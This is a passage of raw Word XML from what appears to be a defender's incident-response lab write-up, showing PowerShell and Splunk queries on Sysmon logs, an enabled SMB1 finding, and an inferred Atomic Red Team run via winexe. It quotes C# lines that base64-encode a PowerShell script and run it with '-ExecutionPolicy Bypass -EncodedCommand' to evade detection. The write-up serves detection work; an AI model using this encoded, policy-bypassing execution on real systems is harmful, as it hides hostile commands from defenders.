          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Where-Object </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>{ $</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>_.State -eq 'Enabled' } |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="786B06E6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Select-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>FeatureName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>, State</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="3CF4ACA7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="11904954" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6759DA01" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A55CADB" wp14:editId="5EE98601">
            <wp:extent cx="4997450" cy="867137"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="650932127" name="Picture 4" descr="A black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932127" name="Picture 4" descr="A black screen with white tex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047951" cy="875900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="7D0D44EE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="011A663C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown SMB1 is enabled and is known to be associated with </w:t>
      </w:r>
      <w:hyperlink w:history="1" r:id="rId16">
        <w:r w:rsidRPr="00A44022">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>numerous vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6CD0C45E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="200A2950" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Returning to our Splunk interface to find if anything else SMB (other than the TCP packet) related was discovered in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="40DF94F0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5C61A1D6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7842D9E0" wp14:editId="19A88663">
            <wp:extent cx="4921250" cy="1587839"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="584800946"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800946" name="Picture 5" descr="A screenshot of a computer&#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51745" cy="1597678"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="288A891A" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="65BA75AC" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">You can see there is nothing. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="3D412F69" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="7B34C17C" w14:textId="66AD2A82">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a point where perhaps as the defender you’ve made the connection that SMBv1 was enabled, undetected by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Though maybe it would have been identified with full PowerShell command logging) and an unauthorized package Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>AtomicRedTeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> has been installed and executed on the target machine from a suspicious IP with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.  So maybe some malicious executable was run encoded to obfuscate the commands used to avoid detection mechanisms like Sysmon, Splunk, and text matching.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="31EFA058" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Recalling these lines from S08_IRA:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="50E711D4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4BA3E541" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        // Encode PowerShell script as Base64 (UTF-16LE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="699ED663" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        string </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>encodedScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Convert.ToBase64</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>String(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encoding.Unicode.GetBytes(powerShellScript));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0D9383C3" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6F32839D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        // Execute PowerShell with Base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="7FF00B94" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ExecutePowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$"-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NoProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>EncodedCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>encodedScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="36F91C09" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0DB55512" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">We know this to be the case. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="497C7882" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4727FBFA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Searching </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="63FA8893" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="1D5658AE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>index=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>winsysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> *Encoded* | table </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>parent_process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="1494C68F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="2A920A08" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Looking at the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>parent_process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> field </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="3F97A395" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="376B5A54" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="2C752222" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="106AC2C8" wp14:editId="6A59FF6A">
            <wp:extent cx="5118100" cy="470800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16144958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495812" name="Picture 16144958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7705" cy="497440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="24AB2F1F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="563B77A6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
